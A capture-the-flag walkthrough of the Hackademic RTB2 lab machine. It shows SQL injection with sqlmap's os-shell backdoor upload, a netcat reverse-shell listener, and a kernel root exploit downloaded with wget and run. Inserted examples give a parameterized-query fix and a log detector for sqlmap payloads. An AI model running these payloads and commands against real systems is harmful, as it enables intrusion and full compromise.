Hackademic: RTB2 – Walkthrough

This is series 2 of Hackademic. Sure, it is a Happy New Year walkthrough for me. Normally I really love sitting in front of my computer. My girlfriend is also away from me, so what am I doing right now?

I love the pain and try to write a walkthrough at this time. Eventually, I am not good at English but still learning to explain for my readers. Because my childhood was so troubled, I was late to enter the computer field. I started at 25 and try to learn many things that interest me. OK. Talk less, do more.


After discovering my local network, I know my target is 192.168.2.101 and scan it with nmap.

┌─[[email protected]]─[~/Desktop/rtb2]
└──> nmap 192.168.2.101

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 20:40 +0630
Nmap scan report for 192.168.2.101
Host is up (0.000075s latency).
Not shown: 998 closed ports
PORT    STATE    SERVICE
80/tcp  open     http
666/tcp filtered doom
MAC Address: 08:00:27:23:34:E5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

Port 80 is open as usual, but port 666 is filtered.

Filtered means a firewall or packet filter is blocking nmap's probes, so nmap cannot tell whether the port is open.

OK. We try another nmap option to bypass the filter. I try the MTU (Maximum Transmission Unit) option to get the packets past it.

┌─[[email protected]]─[~/Desktop/rtb2]
└──> nmap -mtu 24 192.168.2.101

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 20:46 +0630
Nmap scan report for 192.168.2.101
Host is up (0.000098s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
80/tcp  open  http
666/tcp open  doom
MAC Address: 08:00:27:23:34:E5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds

Yes, now both are open. Try first with a dirb scan.

┌─[[email protected]]─[~/Desktop/rtb2]
└──> dirb http://192.168.2.101

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Dec 31 20:48:22 2017
URL_BASE: http://192.168.2.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.2.101/ ----
+ http://192.168.2.101/cgi-bin/ (CODE:403|SIZE:289)                            
+ http://192.168.2.101/check (CODE:200|SIZE:324)                               
+ http://192.168.2.101/index (CODE:200|SIZE:1324)                              
+ http://192.168.2.101/index.php (CODE:200|SIZE:1324)                          
==> DIRECTORY: http://192.168.2.101/javascript/                                
==> DIRECTORY: http://192.168.2.101/phpmyadmin/                                
                     

-----------------
END_TIME: Sun Dec 31 20:48:47 2017
DOWNLOADED: 46120 - FOUND: 11

Found the phpMyAdmin database login. But try to scan port 666 again.

┌─[[email protected]]─[~/Desktop/rtb2]
└──> dirb http://192.168.2.101:666

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Dec 31 20:50:41 2017
URL_BASE: http://192.168.2.101:666/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.2.101:666/ ----
==> DIRECTORY: http://192.168.2.101:666/administrator/                                                                 
==> DIRECTORY: http://192.168.2.101:666/cache/                                                                         
+ http://192.168.2.101:666/cgi-bin/ (CODE:403|SIZE:290)                                                                
==> DIRECTORY: http://192.168.2.101:666/components/                                                                    
+ http://192.168.2.101:666/configuration (CODE:200|SIZE:0)                                                             
==> DIRECTORY: http://192.168.2.101:666/images/                                                                        
==> DIRECTORY: http://192.168.2.101:666/includes/                                                                      
+ http://192.168.2.101:666/index (CODE:200|SIZE:6118)                                                                  
+ http://192.168.2.101:666/index.php (CODE:200|SIZE:6118)                                                              
+ http://192.168.2.101:666/index2 (CODE:200|SIZE:3559)                                                                 
==> DIRECTORY: http://192.168.2.101:666/javascript/                                                                    
==> DIRECTORY: http://192.168.2.101:666/language/                                                                      
==> DIRECTORY: http://192.168.2.101:666/libraries/                                                                     
+ http://192.168.2.101:666/LICENSE (CODE:200|SIZE:17816)                                                               
==> DIRECTORY: http://192.168.2.101:666/logs/                                                                          
==> DIRECTORY: http://192.168.2.101:666/media/                                                                         
==> DIRECTORY: http://192.168.2.101:666/modules/                                                                       
==> DIRECTORY: http://192.168.2.101:666/phpmyadmin/                                                                    
==> DIRECTORY: http://192.168.2.101:666/plugins/                                                                       
+ http://192.168.2.101:666/robots (CODE:200|SIZE:304)                                                                  
+ http://192.168.2.101:666/robots.txt (CODE:200|SIZE:304)                                                              
+ http://192.168.2.101:666/server-status (CODE:403|SIZE:295)                                                           
==> DIRECTORY: http://192.168.2.101:666/templates/                                                                     
==> DIRECTORY: http://192.168.2.101:666/tmp/

Interesting files again! Check them in the web browser.

First I try port 80. I found a user login, tried to log in with a SQL login query but failed, and then I tried to brute-force the username and password. That also failed after a few minutes. So I check the other port, 666.

http://192.168.2.101:666/

I notice the icon in the title. Yes, it is Joomla CMS. Exploring some links on the site, I found the vulnerability in the letter parameter. Try to test whether it is vulnerable or not with a single quote.

http://192.168.2.101:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...%27&Itemid=3

Boom! An error message greets me.

Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' GROUP BY title ORDER BY title' at line 1 SQL=SELECT id, title FROM jos_content WHERE state = 1 AND UPPER(title) LIKE 'List of content items...'%' GROUP BY title ORDER BY title
LIST OF CONTENT ITEMS...'
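The query in the error message splices the letter value straight into a LIKE literal. As an added example (not code from the walkthrough or from Joomla), here is that vulnerable pattern next to a parameterized form, reproduced on an in-memory SQLite table constructed to stand in for jos_content:

```python
import sqlite3

def setup_db():
    # Constructed in-memory stand-in for the jos_content table named in the error message.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jos_content (id INTEGER, title TEXT, state INTEGER)")
    conn.executemany("INSERT INTO jos_content VALUES (?, ?, ?)",
                     [(1, "List of content items...", 1),
                      (2, "Welcome to Joomla", 1),
                      (3, "Unpublished draft", 0)])
    return conn

def lookup_vulnerable(conn, letter):
    # The pattern behind the page's error: `letter` is spliced into the LIKE literal,
    # so a single quote in it closes the string and the rest is parsed as SQL.
    sql = ("SELECT id, title FROM jos_content WHERE state = 1 "
           "AND UPPER(title) LIKE '" + letter + "%' GROUP BY title ORDER BY title")
    return conn.execute(sql).fetchall()

def lookup_safe(conn, letter):
    # Hardened form: the value is bound as a parameter, the % wildcard is appended to
    # the value rather than the query text, and user-supplied wildcards are escaped
    # so a caller cannot turn a prefix search into a "match everything" query.
    escaped = (letter.replace("\\", "\\\\")
                     .replace("%", "\\%")
                     .replace("_", "\\_"))
    sql = ("SELECT id, title FROM jos_content WHERE state = 1 "
           "AND UPPER(title) LIKE ? ESCAPE '\\' GROUP BY title ORDER BY title")
    return conn.execute(sql, (escaped + "%",)).fetchall()

def probe(conn, letter):
    """Run both forms on the same input; a SQL syntax error is reported as 'ERROR'."""
    try:
        vulnerable = lookup_vulnerable(conn, letter)
    except sqlite3.OperationalError:
        vulnerable = "ERROR"
    return vulnerable, lookup_safe(conn, letter)

if __name__ == "__main__":
    db = setup_db()
    for value in ("List of content items...", "List of content items...'", "%"):
        print(repr(value), "->", probe(db, value))
```

The trailing single quote that produced the page's Error 1064 raises a syntax error only in the concatenated form; the bound form treats it, and a bare %, as ordinary characters to search for.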

Now it is time to exploit with sqlmap. Normally I try to find the current user, database name, tables and columns to dump the data, but this time I first try whether it allows an os-shell upload.

┌─[[email protected]]─[~/Desktop/rtb2]
└──> sqlmap -u "http://192.168.2.101:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" -p letter --is-dba --os-shell


[*] starting at 21:02:13

[21:02:14] [INFO] resuming back-end DBMS 'mysql' 
[21:02:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: letter (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: option=com_abc&view=abc&letter=List of content items...' AND (SELECT 5790 FROM(SELECT COUNT(*),CONCAT(0x716b706271,(SELECT (ELT(5790=5790,1))),0x7162767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ycDm'='ycDm&Itemid=3

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: option=com_abc&view=abc&letter=List of content items...' UNION ALL SELECT CONCAT(0x716b706271,0x474b72455870676847716549514648576d77676c486b454d41696d6e786c65714d4143534855416f,0x7162767a71),NULL-- TSkf&Itemid=3
---
[21:02:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL >= 5.0
[21:02:14] [INFO] testing if current user is DBA
[21:02:14] [INFO] fetching current user
current user is DBA:    True
[21:02:14] [INFO] going to use a web backdoor for command prompt
[21:02:14] [INFO] fingerprinting the back-end DBMS operating system
[21:02:14] [WARNING] reflective value(s) found and filtering out
[21:02:14] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[21:02:32] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[21:02:34] [INFO] retrieved web server absolute paths: '/index~.php'
[21:02:34] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[21:02:34] [WARNING] unable to upload the file stager on '/var/www/'
[21:02:34] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[21:02:35] [WARNING] expect junk characters inside the file as a leftover from UNION query
[21:02:35] [INFO] the remote file '/var/www/tmpuuyqk.php' is larger (701 B) than the local file '/tmp/sqlmap5AvFX01768/tmpezMiOe' (700B)
[21:02:35] [INFO] heuristics detected web page charset 'ascii'
[21:02:35] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://192.168.2.101:666/tmpuuyqk.php
[21:02:35] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://192.168.2.101:666/tmpbkdzx.php
[21:02:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ls -al
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
total 288
drwxrwxrwx 19 p0wnbox  p0wnbox   4096 Dec 31 16:32 .
drwxr-xr-x 16 root     root      4096 Jan 17  2011 ..
-rw-rw-rw-  1 root     root     76539 Nov  3  2010 CHANGELOG.php
-rw-rw-rw-  1 root     root      1172 Jan 26  2010 COPYRIGHT.php
-rw-rw-rw-  1 root     root     14918 Nov  2  2010 CREDITS.php
-rw-rw-rw-  1 root     root      4344 Jan 26  2010 INSTALL.php
-rw-rw-rw-  1 root     root     17816 Jan 17  2009 LICENSE.php
-rw-rw-rw-  1 root     root     27986 Jan 26  2010 LICENSES.php
-rwxrwxrwx  1 root     root     21697 Jan 17  2011 Untitledt.png
drwxrwxrwx  7 root     root      4096 Nov  3  2010 _installation
drwxrwxrwx  2 root     root      4096 Jan 22  2011 administrator
drwxrwxrwx  2 root     root      4096 Nov  3  2010 cache
drwxrwxrwx 15 root     root      4096 Jan 22  2011 components
-rw-rw-rw-  1 www-data www-data  1793 Jan 17  2011 configuration.php
-rw-rw-rw-  1 root     root      3411 Jan 26  2010 configuration.php-dist
-rw-rw-rw-  1 root     root      2773 Jan 26  2010 htaccess.txt
drwxrwxrwx  6 root     root      4096 Nov  3  2010 images
drwxrwxrwx  8 root     root      4096 Nov  3  2010 includes
-rw-rw-rw-  1 root     root      2049 Jan 26  2010 index.php
-rw-rw-rw-  1 root     root       588 Jan 26  2010 index2.php
drwxrwxrwx  4 root     root      4096 Nov  3  2010 language
drwxrwxrwx 16 root     root      4096 Nov  3  2010 libraries
drwxrwxrwx  2 root     root      4096 Nov  3  2010 logs
drwxrwxrwx  3 root     root      4096 Nov  3  2010 media
drwxrwxrwx 22 root     root      4096 Nov  3  2010 modules
drwxr-xr-x 11 root     root      4096 Jan 17  2011 [email protected]$!
drwxrwxrwx 11 root     root      4096 Nov  3  2010 plugins
-rw-rw-rw-  1 root     root       304 Aug  8  2006 robots.txt
drwxrwxrwx  7 root     root      4096 Jan 17  2011 templates
drwxrwxrwx  2 root     root      4096 Jan 22  2011 tmp
-rwxr-xr-x  1 www-data www-data   908 Dec 31 16:32 tmpbkdzx.php
-rw-rw-rw-  1 mysql    mysql        0 Dec 31 16:32 tmpukgwv.php
-rw-rw-rw-  1 mysql    mysql      701 Dec 31 16:32 tmpuuyqk.php
drwxrwxrwx  2 root     root      4096 Jan 29  2011 welcome
drwxrwxrwx  4 root     root      4096 Nov  3  2010 xmlrpc
-rw-rw-rw-  1 root     root       177 Jan 17  2011 xxx.html
---
os-shell> 
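A defender's counterpart to the session above, added here and not part of the walkthrough: a small access-log classifier that flags the single-quote probe, the payload shapes sqlmap printed in its output, and requests for the tmpXXXXX.php stager it dropped into the web root. The log lines are constructed to mirror this page's requests, and the regexes are heuristics rather than a complete SQL injection signature.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines modelled on the requests in this walkthrough:
# the single-quote probe, sqlmap's error-based and UNION payloads, the dropped
# stager being called, and one ordinary request as a control.
SAMPLE_LOG = """\
192.168.2.118 - - [31/Dec/2017:21:00:01 +0630] "GET /index.php?option=com_abc&view=abc&letter=List+of+content+items...%27&Itemid=3 HTTP/1.1" 200 6118
192.168.2.118 - - [31/Dec/2017:21:02:14 +0630] "GET /index.php?option=com_abc&view=abc&letter=List+of+content+items...%27+AND+%28SELECT+5790+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716b706271%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27ycDm%27%3D%27ycDm&Itemid=3 HTTP/1.1" 200 6118
192.168.2.118 - - [31/Dec/2017:21:02:14 +0630] "GET /index.php?option=com_abc&view=abc&letter=List+of+content+items...%27+UNION+ALL+SELECT+CONCAT%280x716b706271%2C0x41%2C0x7162767a71%29%2CNULL--+TSkf&Itemid=3 HTTP/1.1" 200 6200
192.168.2.118 - - [31/Dec/2017:21:02:35 +0630] "GET /tmpuuyqk.php HTTP/1.1" 200 120
192.168.2.118 - - [31/Dec/2017:21:05:00 +0630] "GET /index.php?option=com_abc&view=abc&letter=B&Itemid=3 HTTP/1.1" 200 6118
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)')
# Keywords and shapes seen in sqlmap's error-based (FLOOR/RAND, GROUP BY) and UNION
# payloads above, plus the long hex markers it wraps extracted values in.
SQLI_RE = re.compile(r"(?i)\bunion\b.*\bselect\b|\bselect\b.*\bfrom\b|\bconcat\s*\("
                     r"|\bfloor\s*\(\s*rand\b|\bgroup\s+by\b|0x[0-9a-f]{8,}")
# The stager and backdoor on this box were named tmp + five lowercase letters + .php.
STAGER_RE = re.compile(r"^/tmp[a-z]{5}\.php$")

def classify(line):
    """Return the alert tags for one access-log line (empty list if nothing matched)."""
    m = LINE_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    params = parse_qs(url.query)            # percent-decodes the values for us
    letter = params.get("letter", [""])[0]
    tags = []
    if "'" in letter:
        tags.append("quote-in-letter")
    if SQLI_RE.search(letter):
        tags.append("sqli-keywords")
    if STAGER_RE.match(url.path):
        tags.append("sqlmap-stager-path")
    return tags

def scan(log_text):
    """Tags for every non-empty line, in order."""
    return [classify(line) for line in log_text.splitlines() if line.strip()]

if __name__ == "__main__":
    for line, tags in zip(SAMPLE_LOG.splitlines(), scan(SAMPLE_LOG)):
        print(tags or "-", line[:90])
```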

Now try to connect back with Python.

┌─[[email protected]]─[~/Desktop/rtb2]
└──> nc -lvp 6666
listening on [any] 6666 ...
192.168.2.101: inverse host lookup failed: Unknown host
connect to [192.168.2.118] from (UNKNOWN) [192.168.2.101] 37336
/bin/sh: can't access tty; job control turned off

$ python -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/var/www$ id;uname -a
id;uname -a
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Linux HackademicRTB2 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux
[email protected]:/var/www$

Try to find a kernel exploit on Exploit-DB. I notice the kernel version exploit from the last walkthrough can work here. OK, try it.

[email protected]:/tmp$ wget https://www.exploit-db.com/raw/15285 -O lol.c --no-check-certificate
<p$ wget https://www.exploit-db.com/raw/15285 -O lol.c --no-check-certificate
--2017-12-31 16:37:22--  https://www.exploit-db.com/raw/15285
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 7155 (7.0K) [text/plain]
Saving to: `lol.c'

100%[======================================>] 7,155       --.-K/s   in 0s      

2017-12-31 16:37:23 (500 MB/s) - `lol.c' saved [7155/7155]

[email protected]:/tmp$ gcc lol.c
gcc lol.c
[email protected]:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[email protected]:/tmp$ ./a.out
./a.out
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc08cac4c
 [+] Resolved default_security_ops to 0xc0773340
 [+] Resolved cap_ptrace_traceme to 0xc02f5060
 [+] Resolved commit_creds to 0xc016dd80
 [+] Resolved prepare_kernel_cred to 0xc016e0c0
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# id;whoami
id;whoami
uid=0(root) gid=0(root)
root

Bango! Time to read the flag in root's directory. Finally, I decode the base64 and get the secret photo!

Thanks for reading, Happy Hacking!